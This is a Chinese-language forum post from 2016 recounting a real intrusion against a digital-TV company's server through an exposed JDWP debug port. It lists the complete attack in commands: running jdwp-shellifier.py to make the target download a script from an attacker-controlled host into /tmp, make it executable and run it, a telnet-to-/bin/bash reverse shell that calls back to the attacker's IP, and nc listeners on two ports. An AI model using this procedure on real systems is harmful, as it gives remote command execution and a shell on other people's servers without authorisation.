-
-
[旧帖]
[推荐]jdwp 反弹 shell 实战案例
0.00雪花
-
发表于:
2016-7-7 11:06
2666
-
[旧帖] [推荐]jdwp 反弹 shell 实战案例
0.00雪花
反弹shell实战案列:
测试中遇到一个某数字电视jdwp 漏洞,
域名:http://xxx.xxxxx.com.cn:8080/
扫描端口:
发现8000端口 开放jdwp
上利用exp:
(jdwp-shellifier.py )
利用条件需要先访问一下web应用 ,然后执行exp
用法 jdwp-shellifier.py -t 目标IP -p 端口 --cmd "cmd命令"
接下来反弹shell操作:
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget http://x.x.x.x/x.txt -O /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "/tmp/x.sh"
其中 x.txt内容如下:
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
(x.x.x.x 为你自己的外网pc,有路由记得做转发)
然后在x.x.x.x服务器上用nc监听1111端口和3333端口
1111端口是发送命令,3333回显命令结果的
两个cmd窗口
nc -nnv -L -p 3333
nc -nnv -L -p 1111
实际操作:
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "wget http://ai.xxxxx.com/pic.txt -O /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "/tmp/x.sh"
(其中http://ai.xxxxx.com/pic.txt ,为我事先准备好的一个下载地址,也就是x.txt的内容)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)